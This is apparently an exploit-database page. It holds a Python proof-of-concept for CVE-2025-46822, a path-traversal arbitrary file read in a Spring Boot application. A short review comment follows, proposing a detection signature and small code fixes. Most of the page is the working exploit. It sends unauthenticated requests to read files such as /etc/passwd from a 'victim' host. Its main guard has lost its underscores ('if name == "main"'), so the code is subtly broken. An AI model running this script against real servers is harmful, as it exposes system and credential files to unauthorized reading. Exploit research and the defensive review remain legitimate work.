
8 changes to exploits/shellcodes/ghdb Java-springboot-codebase 1.1 - Arbitrary File Read ABB Cylon Aspect Studio 3.08.03 - Binary Planting ABB Cylon Aspect 3.08.03 - Guest2Root Privilege Escalation Grandstream GSD3710 1.0.11.13 - Stack Buffer Overflow WordPress User Registration & Membership Plugin 4.1.2 - Authentication Bypass Microsoft Windows Server 2016 - Win32k Elevation of Privilege Windows 2024.15 - Unauthenticated Desktop Screenshot Capture
57 lines
No EOL
2.2 KiB
Python
Executable file
# Exploit Title: Java-springboot-codebase 1.1 - Arbitrary File Read
|
|
# Google Dork:
|
|
# Date: 23/May/2025
|
|
# Exploit Author: d3sca
|
|
# Vendor Homepage: https://github.com/OsamaTaher/Java-springboot-codebase
|
|
# Software Link: https://github.com/OsamaTaher/Java-springboot-codebase
|
|
# Version: [app version] 1.1
|
|
# Tested on: Debian Linux
|
|
# CVE : CVE-2025-46822
|
|
|
|
#usage: python3 cve-2025-46822.py http://victim.com /etc/passwd
|
|
|
|
import argparse
|
|
import requests
|
|
|
|
from urllib.parse import quote
|
|
def exploit(target, file_path, output=None):
|
|
# Ensure the file path is absolute
|
|
if not file_path.startswith('/'):
|
|
print("[!] Warning: File path is not absolute. Prepending '/' to make it absolute.")
|
|
file_path = '/' + file_path.lstrip('/')
|
|
|
|
# URL-encode the file path
|
|
encoded_path = quote(file_path, safe='')
|
|
|
|
# Construct the target URL
|
|
endpoint = f"/api/v1/files/{encoded_path}"
|
|
url = target.rstrip('/') + endpoint
|
|
print(f"[*] Attempting to retrieve: {file_path}")
|
|
print(f"[*] Sending request to: {url}")
|
|
try:
|
|
response = requests.get(url, allow_redirects=False, timeout=10)
|
|
|
|
if response.status_code == 200:
|
|
print("[+] File retrieved successfully!")
|
|
if output:
|
|
with open(output, 'wb') as f:
|
|
f.write(response.content)
|
|
print(f"[+] Content saved to: {output}")
|
|
else:
|
|
print("\nFile contents:")
|
|
print(response.text)
|
|
else:
|
|
print(f"[-] Failed to retrieve file. Status code: {response.status_code}")
|
|
print(f"[-] Response: {response.text[:200]}") # Show first 200 chars of response
|
|
except Exception as e:
|
|
print(f"[-] An error occurred: {str(e)}")
|
|
|
|
if name == "main":
|
|
parser = argparse.ArgumentParser(description="Exploit Path Traversal Vulnerability in Unauthenticated File API")
|
|
parser.add_argument("target", help="Target base URL (e.g., http://victim:8080)")
|
|
parser.add_argument("file_path", help="Absolute path to target file (e.g., /etc/passwd)")
|
|
parser.add_argument("-o", "--output", help="Output file to save contents")
|
|
|
|
args = parser.parse_args()
|
|
|
|
exploit(args.target, args.file_path, args.output) |
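Review bot: The header records the CVE and a usage line but gives a defender nothing to act on, even though the request shape is fully determined by the code. `quote(file_path, safe='')` encodes every `/` as `%2F`, so the server sees a single unauthenticated GET under `/api/v1/files/` whose final segment is a percent-encoded absolute path. I would add a header comment such as `# Detection: unauthenticated GET /api/v1/files/<segment containing %2F>; a 200 response to such a request warrants review`, plus a line pointing to the vendor advisory for the fixed release, since the page does not state one. Separately, `print(response.text)` in `exploit()` writes server-controlled content straight to the operator's terminal, so `print(repr(response.text))` or requiring `-o` would be safer. The single `except Exception` around both the request and the file write also hides which of the two failed.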